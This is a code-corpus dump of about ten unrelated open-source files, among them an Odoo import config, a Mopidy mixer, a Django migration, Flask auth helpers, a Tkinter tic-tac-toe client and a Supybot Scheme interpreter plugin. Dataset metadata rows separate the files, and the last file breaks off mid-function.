COMPANY_ID = 45 # res.company 'Teddy Beer'
# Product Global Settings
PRODUCT_FIRST_LINE = False # N° de ligne du premier produit
DEFAULT_POS_CATEG_ID = False # pos.category 'Others'
TAX_GROUPS = {
'0.0': False,
'2.1': False,
'5.5': False,
'10.0': False,
'20.0': False,
}
DEFAULT_TAX_GROUP = False
# DEFAULT_PRODUCT_CATEGORY = 223 # "revente / divers / divers"
DEFAULT_PRODUCT_CATEGORY = 227 # "transformations / divers / divers"
# Product Information
COLUMN_PRODUCT_NAME = False
COLUMN_PRODUCT_UOM_ID = False
COLUMN_PRODUCT_CATEG_ID = False
COLUMN_PRODUCT_POS_CATEG_ID = False
# Product Supplier information
COLUMN_PRODUCT_SUPPLIER_NAME = False
COLUMN_PRODUCT_SUPPLIER_PRODUCT_CODE = False
COLUMN_PRODUCT_SUPPLIER_PRODUCT_NAME = False
COLUMN_PRODUCT_SUPPLIER_GROSS_PRICE = False
COLUMN_PRODUCT_SUPPLIER_DISCOUNT = False
COLUMN_PRODUCT_SUPPLIER_INVOICE_QTY = False
COLUMN_PRODUCT_SUPPLIER_PACKAGE_QTY = False
# Product Sale Information
COLUMN_PRODUCT_MAKER = False
COLUMN_PRODUCT_EAN_13 = False
COLUMN_PRODUCT_VOLUME = False
COLUMN_PRODUCT_NET_WEIGHT = False
COLUMN_PRODUCT_COUNTRY_ID = False
COLUMN_PRODUCT_TAX_GROUP_ID = False
COLUMN_PRODUCT_STANDARD_PRICE = False
COLUMN_PRODUCT_SALE_PRICE = False
COLUMN_PRODUCT_SALE_ALTERNATIVE = False
# Product Food Information
COLUMN_PRODUCT_LABEL_1 = False
COLUMN_PRODUCT_LABEL_2 = False
COLUMN_PRODUCT_LABEL_3 = False
# Partner Global Settings
PARTNER_FIRST_LINE = 2
# partner Information
COLUMN_PARTNER_NAME = 'B'
COLUMN_PARTNER_EMAIL = 'G'
COLUMN_PARTNER_PHONE = 'F'
COLUMN_PARTNER_FAX = False
COLUMN_PARTNER_MOBILE = False
COLUMN_PARTNER_WEBSITE = False
COLUMN_PARTNER_VAT = False
COLUMN_PARTNER_STREET = 'C'
COLUMN_PARTNER_ZIP = 'D'
COLUMN_PARTNER_CITY = 'E'
COLUMN_PARTNER_COUNTRY_ID = False
COLUMN_PARTNER_COMMENT = 'H'
COLUMN_PARTNER_IS_CUSTOMER = 'A'
COLUMN_PARTNER_IS_SUPPLIER = False
COLUMN_PARTNER_IS_INDIVIDUAL = False
# Lead Global Settings
LEAD_FIRST_LINE = 2
DEFAULT_CRM_CASE_STAGE = 'jamais contacte'
# DEFAULT_LEAD_TYPE = 'lead'
DEFAULT_LEAD_TYPE = 'opportunity'
# Lead Information
COLUMN_LEAD_NAME = 'B'
COLUMN_LEAD_STAGE = 'A'
COLUMN_LEAD_EMAIL = 'G'
COLUMN_LEAD_PHONE = 'F'
COLUMN_LEAD_MOBILE = False
COLUMN_LEAD_STREET = 'C'
COLUMN_LEAD_ZIP = 'D'
COLUMN_LEAD_CITY = 'E'
COLUMN_LEAD_COUNTRY_ID = False
COLUMN_LEAD_DESCRIPTION = 'H'
CRM_CASE_STAGES = {
'jamais contacte': 39,
'1er contact': 40,
'contact en cours': 41,
'contact fait': 44,
'ne pas recontacter/mort': 43,
}
|
agpl-3.0
| 3,428,622,632,381,325,300 | 25.581633 | 73 | 0.716315 | false |
knutz3n/mopidy-yamaha
|
mopidy_yamaha/mixer.py
|
1
|
1347
|
"""Mixer that controls volume using a Yamaha receiver."""
from __future__ import unicode_literals
import logging
from mopidy import mixer
import pykka
from mopidy_yamaha import talker
logger = logging.getLogger(__name__)
class YamahaMixer(pykka.ThreadingActor, mixer.Mixer):
name = 'yamaha'
def __init__(self, config):
super(YamahaMixer, self).__init__(config)
self.host = config['yamaha']['host']
self.source = config['yamaha']['source']
self.party_mode = config['yamaha']['party_mode']
self._volume_cache = 0
self._yamaha_talker = None
def get_volume(self):
return self._volume_cache
def set_volume(self, volume):
self._volume_cache = volume
self._yamaha_talker.set_volume(volume)
self.trigger_volume_changed(volume)
return True
def get_mute(self):
return False
def set_mute(self, mute):
self._yamaha_talker.mute(mute)
self.trigger_mute_changed(mute)
def on_start(self):
self._start_yamaha_talker()
def _start_yamaha_talker(self):
self._yamaha_talker = talker.YamahaTalker.start(
host=self.host,
source=self.source,
party_mode=self.party_mode,
).proxy()
self._volume_cache = self._yamaha_talker.get_volume().get()
|
apache-2.0
| 997,962,807,195,209,600 | 23.053571 | 67 | 0.621381 | false |
fmance/deep-medical-ir
|
ranking/combine.py
|
1
|
1874
|
import os
import sys
from collections import defaultdict
sys.path.insert(0, "../utils/")
import utils
CLASS_ID = sys.argv[1]
YEAR = sys.argv[2]
CLASSIFIERS = [
"LinearSVC.squared_hinge.l2",
"SGDClassifier.hinge.l2",
"SGDClassifier.hinge.elasticnet",
"SGDClassifier.squared_loss.l2",
"SGDClassifier.squared_loss.elasticnet",
"SGDClassifier.epsilon_insensitive.l2",
"SGDClassifier.epsilon_insensitive.elasticnet",
"Pipeline.epsilon_insensitive.l2"
]
def getResultsFiles():
resultsFiles = []
for classifier in CLASSIFIERS:
resultsFiles.append("../ir/results/results-" + YEAR + ".txt.reranked." + CLASS_ID + "." + classifier)
return resultsFiles
def readMultipleResults(resultsFiles):
resultsList = []
for resultsFile in resultsFiles:
results = utils.readResults(resultsFile)
resultsList.append(results)
return resultsList
def combSum(resultsList):
combSumResults = {}
qids = resultsList[0].keys()
for qid in qids:
queryResultsList = [results[qid] for results in resultsList]
resultsSum = defaultdict(float)
for didRankScores in queryResultsList:
for did, _, score in didRankScores:
resultsSum[did] += score # normalize!!!
combSumResults[qid] = resultsSum
return combSumResults
def writeResults(results, outFile):
out = open(outFile, "w")
for qid, queryResults in results.items():
rank = 1
queryResults = queryResults.items()
queryResults.sort(key = lambda docScore : docScore[1], reverse = True)
for did, score in queryResults:
out.write("%d Q0 %s %d %f STANDARD\n" % (qid, did, rank, score))
rank += 1
out.close()
def run():
resultsFiles = getResultsFiles()
resultsList = readMultipleResults(resultsFiles)
combinedResults = combSum(resultsList)
rerankedResultsFile = "../ir/results/results-" + YEAR + ".txt.reranked." + CLASS_ID + ".combined"
writeResults(combinedResults, rerankedResultsFile)
run()
|
gpl-3.0
| 4,474,460,145,658,808,300 | 26.970149 | 103 | 0.733725 | false |
openqt/algorithms
|
leetcode/python/lc705-design-hashset.py
|
1
|
1918
|
# coding=utf-8
import unittest
"""705. Design HashSet
https://leetcode.com/problems/design-hashset/description/
Design a HashSet without using any built-in hash table libraries.
To be specific, your design should include these functions:
* `add(value)`: Insert a value into the HashSet.
* `contains(value)` : Return whether the value exists in the HashSet or not.
* `remove(value)`: Remove a value in the HashSet. If the value does not exist in the HashSet, do nothing.
**Example:**
MyHashSet hashSet = new MyHashSet();
hashSet.add(1);
hashSet.add(2);
hashSet.contains(1); // returns true
hashSet.contains(3); // returns false (not found)
hashSet.add(2);
hashSet.contains(2); // returns true
hashSet.remove(2);
hashSet.contains(2); // returns false (already removed)
**Note:**
* All values will be in the range of `[0, 1000000]`.
* The number of operations will be in the range of `[1, 10000]`.
* Please do not use the built-in HashSet library.
Similar Questions:
Design HashMap (design-hashmap)
"""
class MyHashSet(object):
def __init__(self):
"""
Initialize your data structure here.
"""
def add(self, key):
"""
:type key: int
:rtype: void
"""
def remove(self, key):
"""
:type key: int
:rtype: void
"""
def contains(self, key):
"""
Returns true if this set contains the specified element
:type key: int
:rtype: bool
"""
# Your MyHashSet object will be instantiated and called as such:
# obj = MyHashSet()
# obj.add(key)
# obj.remove(key)
# param_3 = obj.contains(key)
def test(self):
pass
if __name__ == "__main__":
unittest.main()
|
gpl-3.0
| 4,615,475,879,569,879,000 | 20.77907 | 107 | 0.569864 | false |
Bakterija/sshare
|
src/server_funcs.py
|
1
|
1604
|
from urllib.parse import urlparse, urljoin
from flask import Flask, Markup, Response, render_template, request
from flask import redirect, url_for, send_from_directory, flash
from logs import Logger, GeventLoggerInfo, GeventLoggerError
from functools import wraps
import app_globals as gvars
import utils
def check_auth(username, password):
"""This function is called to check if a username /
password combination is valid.
"""
user = gvars.manager.get_user(username)
if user:
return user.id == username and password == user.passwd
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in gvars.manager.upload_extensions
def create_file_share_link():
new_link = gvars.manager.url('/file/%s' % (utils.get_random_string(24)))
return new_link
def is_safe_url(target):
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and \
ref_url.netloc == test_url.netloc
|
mit
| 327,322,569,458,350,140 | 33.869565 | 80 | 0.680798 | false |
axeliodiaz/django-curriculum
|
curriculum/migrations/0001_initial.py
|
1
|
10753
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-19 15:42
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Accomplishment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('description', models.TextField()),
('order', models.IntegerField(default=0)),
],
options={
'db_table': 'accomplishments',
'ordering': ['order'],
},
),
migrations.CreateModel(
name='EducationInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('start', models.DateTimeField(blank=True, null=True, verbose_name='start')),
('end', models.DateTimeField(blank=True, null=True, verbose_name='end')),
('name', models.CharField(max_length=250)),
('location', models.CharField(max_length=250)),
('school_url', models.URLField(verbose_name='School URL')),
('summary', models.TextField()),
('is_current', models.BooleanField(default=False)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Education',
},
),
migrations.CreateModel(
name='JobInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('start', models.DateTimeField(blank=True, null=True, verbose_name='start')),
('end', models.DateTimeField(blank=True, null=True, verbose_name='end')),
('company', models.CharField(max_length=250)),
('location', models.CharField(max_length=250)),
('title', models.CharField(max_length=250)),
('company_url', models.URLField(verbose_name='Company URL')),
('description', models.TextField(blank=True)),
('is_current', models.BooleanField(default=False)),
('is_public', models.BooleanField(default=True)),
('company_image', models.CharField(blank=True, help_text='Path to company image, local or otherwise', max_length=250)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'jobs',
'ordering': ['-end', '-start'],
},
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=250)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='LanguageInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('level', models.CharField(max_length=250)),
('language', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='curriculum.Language')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Overview',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('text', models.TextField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Overview',
},
),
migrations.CreateModel(
name='PersonalPhone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=255)),
('phone', models.IntegerField(blank=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='PersonalSocialMedia',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('linkedin', models.CharField(blank=True, max_length=255, null=True)),
('twitter', models.CharField(blank=True, max_length=255, null=True)),
('github', models.CharField(blank=True, max_length=255, null=True)),
('bitbucket', models.CharField(blank=True, max_length=255, null=True)),
('gitlab', models.CharField(blank=True, max_length=255, null=True)),
('gplus', models.CharField(blank=True, max_length=255, null=True)),
('instagram', models.CharField(blank=True, max_length=255, null=True)),
('snapchat', models.CharField(blank=True, max_length=255, null=True)),
('skype', models.CharField(blank=True, max_length=255, null=True)),
('wordpress', models.URLField(blank=True, verbose_name='wordpress')),
('youtube', models.URLField(blank=True, verbose_name='youtube')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Skill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=250)),
('skill_url', models.URLField(blank=True, verbose_name='Skill URL')),
],
options={
'ordering': ['id'],
},
),
migrations.CreateModel(
name='Skillset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=250)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='skill',
name='skillset',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='curriculum.Skillset'),
),
migrations.AddField(
model_name='skill',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='accomplishment',
name='job',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='curriculum.JobInfo'),
),
]
|
mit
| -8,305,945,602,906,848,000 | 54.715026 | 147 | 0.588022 | false |
crcollins/molml
|
tests/test_io.py
|
1
|
2267
|
import unittest
import os
import numpy
from molml.io import read_file_data
from molml.io import read_out_data, read_xyz_data, read_mol2_data
from molml.io import read_cry_data
DATA_PATH = os.path.join(os.path.dirname(__file__), "data")
ELEMENTS = ['C', 'H', 'H', 'H', 'H']
NUMBERS = [6, 1, 1, 1, 1]
COORDS = [
[0.99826008, -0.00246000, -0.00436000],
[2.09021016, -0.00243000, 0.00414000],
[0.63379005, 1.02686007, 0.00414000],
[0.62704006, -0.52773003, 0.87811010],
[0.64136006, -0.50747003, -0.90540005],
]
UNIT = [
[2.0, 0.5, 0.05],
[0.0, 2.0, 0.05],
[0.0, 0.1, 2.0],
]
class IOTest(unittest.TestCase):
def test_read_file_data(self):
base_path = os.path.join(DATA_PATH, "methane")
data = (
('.out', read_out_data),
('.xyz', read_xyz_data),
('.mol2', read_mol2_data),
('.cry', read_cry_data),
)
for ending, func in data:
path = base_path + ending
v1 = func(path)
v2 = read_file_data(path)
self.assertEqual(v1.elements.tolist(), v2.elements.tolist())
self.assertEqual(v1.numbers.tolist(), v2.numbers.tolist())
self.assertTrue(numpy.allclose(v1.coords, v2.coords))
self.assertEqual(v1.elements.tolist(), ELEMENTS)
try:
numpy.testing.assert_array_almost_equal(
v1.coords,
COORDS,
decimal=3)
except AssertionError as e:
self.fail(e)
self.assertEqual(v1.numbers.tolist(), NUMBERS)
def test_empty_file(self):
path = os.path.join(DATA_PATH, "empty")
read_mol2_data(path)
def test_read_cry_data_unit(self):
path = os.path.join(DATA_PATH, "methane.cry")
v = read_cry_data(path)
try:
numpy.testing.assert_array_almost_equal(
v.unit_cell,
UNIT,
decimal=3)
except AssertionError as e:
self.fail(e)
def test_read_file_data_error(self):
path = "garbage.nope"
with self.assertRaises(ValueError):
read_file_data(path)
if __name__ == '__main__':
unittest.main()
|
mit
| 5,609,494,878,036,751,000 | 28.064103 | 72 | 0.538156 | false |
gandrewstone/yadog
|
kid/test/test_serialization_escaping.py
|
1
|
3828
|
# -*- coding: utf-8 -*-
"""Tests exercising text escaping."""
__revision__ = "$Rev: 492 $"
__date__ = "$Date: 2007-07-06 21:38:45 -0400 (Fri, 06 Jul 2007) $"
__author__ = "David Stanek <dstanek@dstanek.com>"
__copyright__ = "Copyright 2006, David Stanek"
__license__ = "MIT <http://www.opensource.org/licenses/mit-license.php>"
from kid.serialization import XMLSerializer, XHTMLSerializer, HTMLSerializer
XML = XMLSerializer
XHTML = XHTMLSerializer
HTML = HTMLSerializer
TEST_CHARS = ('<', '>', '"', "'", '&',)
TEST_STRINGS = ('str', 'k\204se')
TEST_COMBO = ('str<"&">str', "k\204se<'&'>k\204se")
def escape_functions():
"""Generator producing escape functions."""
for serializer in (HTMLSerializer, XMLSerializer, XHTMLSerializer):
for escape in (serializer.escape_cdata, serializer.escape_attrib):
yield serializer, escape
def do_escape(func, test_chars, result_chars, encoding=None):
for x, char in enumerate(test_chars):
assert func(char, encoding) == result_chars[x]
def test_escape():
expected = {
XML.escape_cdata: ('<', '>', '"', "'", '&',),
XML.escape_attrib: ('<', '>', '"', "'", '&',),
XHTML.escape_cdata: ('<', '>', '"', "'", '&',),
XHTML.escape_attrib: ('<', '>', '"', "'", '&',),
HTML.escape_cdata: ('<', '>', '"', "'", '&',),
HTML.escape_attrib: ('<', '>', '"', "'", '&',),
}
for serializer, escape in escape_functions():
do_escape(escape, TEST_CHARS, expected[escape])
def test_escape_encoding():
"""Test the encoding part of the escaping functions."""
ascii_expected = ('str', 'k\204se')
utf8_expected = ('str', 'k„se')
for serializer, escape in escape_functions():
do_escape(escape, TEST_STRINGS, ascii_expected)
do_escape(escape, TEST_STRINGS, utf8_expected, 'utf-8')
def test_escape_encoding_combo():
ascii_expected = {
XML.escape_cdata:
('str<"&">str', "k\204se<'&'>k\204se"),
XML.escape_attrib:
('str<"&">str', "k\204se<'&'>k\204se"),
XHTML.escape_cdata:
('str<"&">str', "k\204se<'&'>k\204se"),
XHTML.escape_attrib:
('str<"&">str', "k\204se<'&'>k\204se"),
HTML.escape_cdata:
('str<"&">str', "k\204se<'&'>k\204se"),
HTML.escape_attrib:
('str<"&">str', "k\204se<'&'>k\204se"),
}
utf8_expected = {
XML.escape_cdata:
('str<"&"str', "1k„se<'&'>k„se"),
XML.escape_attrib:
('str<"&">str',
"k„se<'&'>k„se"),
XHTML.escape_cdata:
('str<"&">str', "k„se<'&'>k„se"),
XHTML.escape_attrib:
('str<"&">str',
"k„se<'&'>k„se"),
HTML.escape_cdata:
('str<"&">str', "k„se<'&'>k„se"),
HTML.escape_attrib:
('str<"&">str',
"k„se<'&'>k„se"),
}
for serializer, escape in escape_functions():
do_escape(escape, TEST_COMBO, ascii_expected[escape])
do_escape(escape, TEST_COMBO, utf8_expected[escape], 'utf-8')
def test_escaping_int():
for serializer, escape in escape_functions():
try:
assert escape(1)
except TypeError, e:
assert str(e) == 'cannot serialize 1 (type int)'
def test_escaping_nbsp():
for serializer, escape in escape_functions():
assert escape('\xa0', 'ascii') == ' '
assert escape('\xa0', 'ascii', {'\xa0': 'bingo'}) == 'bingo'
|
gpl-3.0
| 4,572,696,431,716,807,000 | 38.463918 | 76 | 0.549896 | false |
mjzffr/nettt
|
nettt/nettt_gui.py
|
1
|
6334
|
#!/usr/bin/env python2
import Tkinter as tk
# themed tk
import ttk
import tkFont
import nettt_client as c
WIDTH = 750
HEIGHT = 800
PLAYER_LABELS = {c.BSTATES['P1']:'X',
c.BSTATES['P2']:'O',
c.BSTATES['EMPTY']:''}
CONNMSGS = {'connect':'Connecting...',
'waiting': 'Connected. Awaiting partner.',
'insession': 'Connected. You are',
'failed': 'Connection failed.'}
TURNMSGS = {'partner': "Partner's turn.",
'you': 'Your turn.'}
class TkTictactoe(ttk.Frame):
def __init__(self, master = None):
ttk.Frame.__init__(self, master, width=WIDTH, height=HEIGHT)
# don't shrink the frame to its content
self.grid_propagate(False)
# draw the frame (and its content); make all the edges of the frame
# stick to the edges of the root window
self.grid(sticky=tk.NSEW)
# All the board buttons should expand if the main window is resized
# We achieve this by giving w/h of the cells on the diagonal the same
# "expansion" weight
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.columnconfigure(1, weight=1)
self.rowconfigure(1, weight=1)
self.columnconfigure(2, weight=1)
self.rowconfigure(2, weight=1)
self.place_widgets()
self.client = c.TTTClient()
self.connect()
def place_widgets(self):
# game buttons
self.board = [[tk.Button(self, font=tkFont.Font(size=60), fg='black')
for i in range(3)] for i in range(3)]
for rownum, row in enumerate(self.board):
for colnum, button in enumerate(row):
name = str(rownum) + ',' + str(colnum)
button.grid(column=colnum, row=rownum, sticky=tk.NSEW)
button.bind("<Button-1>", self.record_move)
# menu
self.conn_btn = tk.Button(self, text='Connect', command=self.connect)
self.conn_btn.grid(column=0, row=4, pady=10)
self.quit_btn = ttk.Button(self, text='Exit', command=self.quit)
self.quit_btn.grid(column=2, row=4, pady=10)
self.newgame_btn = ttk.Button(self, text='New Game',
command=self.start_new_game)
self.newgame_btn.grid(column=2, row=3, pady=10)
# status
self.glostlbl = tk.Label(self, text="Games Lost: 0")
self.glostlbl.grid(column=1, row=3)
self.gwonlbl = tk.Label(self, text="Games Won: 0")
self.gwonlbl.grid(column=0, row=3)
self.connlbl = tk.Label(self, text=CONNMSGS['connect'])
self.connlbl.grid(column=1, row=4)
self.turnlbl = tk.Label(self, text='')
self.turnlbl.grid(column=1, row=5)
for i in [self.connlbl, self.turnlbl]:
i['wraplength'] = WIDTH/7
i['padx'] = 0
def connect(self):
# connect button
self.connlbl['text'] = CONNMSGS['connect']
self.client.connect()
if self.client.connected:
self.conn_btn['fg'] = 'black'
self.connlbl['text'] = CONNMSGS['waiting']
else:
self.conn_btn['fg'] = 'red'
self.connlbl['text'] = CONNMSGS['failed']
#TODO
# self.THISPLAYER = ??? #TODO: THISPLAYER should actually belong to client
def quit(self):
self.client.end_session()
self.master.quit()
def record_move(self, event):
''' process human move '''
# if not self.game.is_over():
# if event.widget['text'] == '':
# P = self.THISPLAYER
# player_repr = PLAYER_LABELS[P]
# self.game.make_move(P, self.find_button_coords(event.widget))
# event.widget['text'] = player_repr
# # check for game over each time make_move is called
# if self.game.is_over():
# self.cleanup()
# self.record_computer_move()
# def record_computer_move(self):
# ''' process move generated by super fancy game ai'''
# if not self.game.is_over():
# PLAYER = self.THISPLAYER * -1
# player_repr = PLAYER_LABELS[PLAYER]
# (row, col) = self.game.make_random_move(PLAYER)
# self.board[row][col]['text'] = player_repr
# # check for game over each time make_move is called
# if self.game.is_over():
# self.cleanup()
def cleanup(self):
''' update/reset after finished game '''
pass
# mode = self.game.mode
# if mode == ttt.GSTATES['P1WON']:
# self.update_status_lbl(self.gwonlbl,
# self.game.wins[self.THISPLAYER])
# elif mode == ttt.GSTATES['P2WON']:
# self.update_status_lbl(self.glostlbl,
# self.game.losses[self.THISPLAYER])
# if mode < 2: # X won or O won
# for (row,col) in self.game.lastwincoords:
# self.board[row][col].configure(fg="red")
def start_new_game(self):
pass
# PLAYER = self.THISPLAYER
# self.game.reset(PLAYER)
# self.update_status_lbl(self.glostlbl, self.game.losses[PLAYER])
# # reset the buttons
# for row in self.board:
# for b in row:
# b['text'] = ''
# b['fg'] = 'black'
def update_status_lbl(self, label, newcount):
ltext = label['text']
label['text'] = (ltext[:ltext.rindex(':') + 1] + " " +
str(newcount))
def find_button_coords(self, button):
# This sucks. I don't know how to associate a button with an id in tk
# but it seems impossible
for r,row in enumerate(self.board):
for c,b in enumerate(row):
if b is button:
return (r,c)
raise Exception("Button not found!")
# puts the Tktictactoe frame in main root window
if __name__ == "__main__":
root = tk.Tk()
# the window content should expand if the main window is resized
root.grid_columnconfigure(0, weight=1)
root.grid_rowconfigure(0, weight=1)
gameframe = TkTictactoe(master = root)
root.title("Tic Tac Toe!")
root.mainloop()
|
unlicense
| 3,240,913,328,061,072,000 | 33.237838 | 86 | 0.548942 | false |
kg-bot/SupyBot
|
plugins/Scheme/plugin.py
|
1
|
8304
|
###
# Copyright (c) 2013, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import ast
import copy
import operator
import fractions
import functools
import collections
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
from supybot.i18n import PluginInternationalization, internationalizeDocstring
_ = PluginInternationalization('Scheme')
NUMBER_TYPES = (
('integer', int),
('rational', fractions.Fraction),
('real', float),
('complex', complex),
('number', str),
)
class SchemeException(Exception):
pass
def no_edge_effect(f):
def newf(tree, env):
return f(tree, env.copy())
return newf
def eval_argument(arg, env):
if isinstance(arg, list):
return eval_scheme(arg, env)
elif isinstance(arg, str):
if arg in env:
return eval_argument(env[arg], {})
else:
for name, parser in NUMBER_TYPES:
try:
return parser(arg)
except ValueError:
pass
# You shall not pass
raise SchemeException(_('Unbound variable: %s') % arg)
else:
return arg
def py2scheme(tree):
if isinstance(tree, list):
return '(%s)' % (' '.join(map(py2scheme, tree)))
else:
return str(tree)
def schemify_math(f):
# Makes a two-arguments function an *args function, with correct
# type parsing.
def rec(args):
if args[2:]:
return f(args[0], rec(args[1:]))
else:
return f(args[0], args[1])
def newf(tree, env):
return rec(map(functools.partial(eval_argument, env=env), tree[1:]))
newf.__name__ = 'schemified_%s' % f.__name__
return newf
ARGUMENTS_ERROR = _('%s takes %s %i arguments not %i (in (%s))')
@no_edge_effect
def scm_lambda(tree, env):
try:
self, args, expr = tree
except ValueError:
raise SchemeException(ARGUMENTS_ERROR %
('lambda', _('exactly'), 2, len(tree)-1, py2scheme(tree)))
if not isinstance(args, list):
args = ['.', args]
try:
if args.index('.') != len(args)-2:
raise SchemeException(_('Invalid arguments list: %s') %
py2scheme(args))
rest = args[-1]
args = args[0:-2]
except ValueError: # No rest
rest = None
@no_edge_effect
def f(tree2, env2):
self2, args2 = tree2[0], tree2[1:]
arguments_error = ARGUMENTS_ERROR % \
(self2, '%s', len(args), len(args2), tree2)
env3 = env2.copy()
if len(args2) < len(args):
raise SchemeException(arguments_error %
_('at least') if rest else _('exactly'))
